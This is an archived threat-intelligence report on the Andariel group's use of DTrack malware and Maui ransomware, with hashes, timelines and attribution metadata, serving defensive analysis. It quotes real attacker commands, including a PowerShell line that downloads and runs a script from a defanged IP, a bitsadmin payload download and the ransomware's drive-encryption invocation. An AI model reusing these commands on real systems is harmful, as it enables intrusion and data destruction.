{ "id": "4f80e490-220f-45cd-a915-811e4be78ac7", "created_at": "2026-04-06T00:10:21.867278Z", "updated_at": "2026-04-10T03:34:54.525052Z", "deleted_at": null, "sha1_hash": "2bd387ccf00914086aa6eb9f119f7923a04fb12b", "title": "Andariel deploys DTrack and Maui ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 562690, "plain_text": "Andariel deploys DTrack and Maui ransomware\r\nBy Kurt Baumgartner\r\nPublished: 2022-08-09 · Archived: 2026-04-05 19:39:40 UTC\r\nOn July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui\r\nRansomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui\r\nRansomware.” Later, the Department of Justice announced that they had effectively clawed back $500,000 in\r\nransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in\r\n2022, and add some incident and attribution findings.\r\nWe extend their “first seen” date from the reported May 2021 to April 15th 2021, and the geolocation of the target,\r\nto Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are\r\nthe same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\r\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we\r\ndetermined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a\r\nvariant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along\r\nwith others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent\r\nChollima and Stonefly, with low to medium confidence.\r\nBackground\r\nWe observed the following timeline of detections from an initial target system:\r\n1. 1 2020-12-25 Suspicious 3proxy tool\r\n2. 2 2021-04-15 DTrack malware\r\n3. 3 2021-04-15 Maui ransomware\r\nDTrack malware\r\nMD5 739812e2ae1327a94e441719b885bd19\r\nSHA1 102a6954a16e80de814bee7ae2b893f1fa196613\r\nSHA256 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67\r\nLink time 2021-03-30 02:29:15\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompiler VS2008 build 21022\r\nFile size 1.2 MB\r\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nPage 1 of 6\n\nFile name C:\\Windows\\Temp\\temp\\mvhost.exe\r\nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload.\r\nThis malware is responsible for collecting victim information and sending it to the remote host. Its functionality is\r\nalmost identical to previous DTrack modules. This malware collects information about the infected host via\r\nWindows commands. The in-memory payload executes the following Windows commands:\r\n\"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all \u003e \"%Temp%\\temp\\res.ip\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c tasklist \u003e \"%Temp%\\temp\\task.list\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp \u003e \"%Temp%\\temp\\netstat.res\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface \u003e\r\n\"%Temp%\\temp\\netsh.res\"\r\n\"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 \u003e \"%Temp%\\temp\\ping.res\"\r\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant\r\ndid. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a\r\nremote server over HTTP, and this variant copies stolen files to the remote host on the same network.\r\nMaui ransomware\r\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\r\nMD5 ad4eababfe125110299e5a24be84472e\r\nSHA1 94db86c214f4ab401e84ad26bb0c9c246059daff\r\nSHA256 a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa\r\nLink time 2021-04-15 04:36:00\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile size 763.67 KB\r\n File name C:\\Windows\\Temp\\temp\\maui.exe\r\nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using “-t” and “- x”\r\narguments, along with a specific drive path to encrypt:\r\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nPage 2 of 6\n\nC:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\r\nIn this case, “-t 8” sets the ransomware thread count to eight, “-x” commands the malware to “self melt”, and the\r\n“E:” value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as\r\ndescribed in the Stairwell report.\r\nThe malware created two key files to implement file encryption:\r\nRSA private key C:\\Windows\\Temp\\temp\\bin\\Maui.evd\r\nRSA public key C:\\Windows\\Temp\\temp\\bin\\Maui.key\r\nSimilar DTrack malware on different victims\r\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of\r\nthese hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to\r\ndeploy this malware within the target organization, but this speculation is based on paths and other artifacts, and\r\nwe do not have any further details.\r\nMD5 f2f787868a3064407d79173ac5fc0864\r\nSHA1 1c4aa2cbe83546892c98508cad9da592089ef777\r\nSHA256 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae\r\nLink time 2021-02-22 05:36:16\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nFile size 848 KB\r\nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using\r\ndifferent login credentials and local IP address to exfiltrate data.\r\nWindows commands to exfiltrate data\r\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4)\r\nusing different login credentials.\r\nAdditional DTrack module and initial infection method\r\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nPage 3 of 6\n\nThe “3Proxy” tool, likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on\r\n2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an\r\nadditional DTrack module. This module was compiled 2020-09-16 14:16:21 and detected in early December\r\n2020, having a similar timeline to the 3Proxy tool deployment.\r\nMD5 cf236bf5b41d26967b1ce04ebbdb4041\r\nSHA1 feb79a5a2bdf0bcf0777ee51782dc50d2901bb91\r\nSHA256 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145\r\nLink time 2020-09-16 14:16:21\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompiler VS2008 build 21022\r\nFile size 136 KB\r\nFile name %appdata%\\microsoft\\mmc\\dwem.cert\r\nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our\r\nThreat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, HFS7,\r\nhad deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and “whoami”\r\nwas executed, the Powershell command below was executed to fetch an additional Powershell script from the\r\nremote server:\r\nC:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object\r\nNet.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\r\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\r\nbitsadmin.exe /transfer myJob /download /priority high\r\n\"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\r\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this\r\nserver via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic\r\nservers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the\r\nexploited server executes the Powershell command to fetch the additional script. The fetched script is capable of\r\ndownloading a Powershell script from the server we mentioned above\r\n(hxxp://145.232.235[.]222/usr/users/mini.ps1). Therefore, we can summarize that the actor abused vulnerable\r\nInternet-facing services to deploy their malware at least until the end of 2020.\r\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nPage 4 of 6\n\nVictims\r\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui\r\nransomware within the US. However, based on our research, we believe this operation does not target specific\r\nindustries and that its reach is global. We can confirm that the Japanese housing company was targeted with the\r\nMaui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar\r\ntimeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early\r\n2021.\r\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world,\r\nregardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors\r\nvulnerable Internet-exposed web services. Additionally, the Andariel deployed ransomware selectively to make\r\nfinancial profits.\r\nAttribution\r\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a\r\nhigh degree of code similarity (84%) with previously known DTrack malware.\r\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same\r\nshellcode loader as “Backdoor.Preft” malware (MD5 2f553cba839ca4dab201d3f8154bae2a), published/reported\r\nby Symantec – note that Symantec recently described the Backdoor.Preft malware as “aka Dtrack, Valefor”. Apart\r\nfrom the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool\r\nwas also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5\r\n95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind\r\nthe DarkSeoul incident.\r\nConclusions\r\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nPage 5 of 6\n\nBased on the modus operandi of this attack, we conclude that the actor’s TTPs behind the Maui ransomware\r\nincident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\r\nUsing legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and\r\nusing Powershell scripts and Bitsadmin to download additional malware;\r\nUsing exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\r\nExclusively deploying DTrack, also known as Preft;\r\nDwell time within target networks can last for months prior to activity;\r\nDeploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest\r\nSource: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/" ], "report_names": [ "107063" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d", "created_at": "2024-05-01T02:03:07.943593Z", "updated_at": "2026-04-10T02:00:03.795229Z", "deleted_at": null, "main_name": "BRONZE EDISON", "aliases": [ "APT4 ", "DarkSeoul", "Maverick Panda ", "Salmon Typhoon ", "Sodium ", "Sykipot ", "TG-0623 ", "getkys" ], "source_name": "Secureworks:BRONZE EDISON", "tools": [ "Gh0st RAT", "Wkysol", "ZxPortMap" ], "source_id": "Secureworks", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434221, "ts_updated_at": 1775792094, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2bd387ccf00914086aa6eb9f119f7923a04fb12b.pdf", "text": "https://archive.orkl.eu/2bd387ccf00914086aa6eb9f119f7923a04fb12b.txt", "img": "https://archive.orkl.eu/2bd387ccf00914086aa6eb9f119f7923a04fb12b.jpg" } }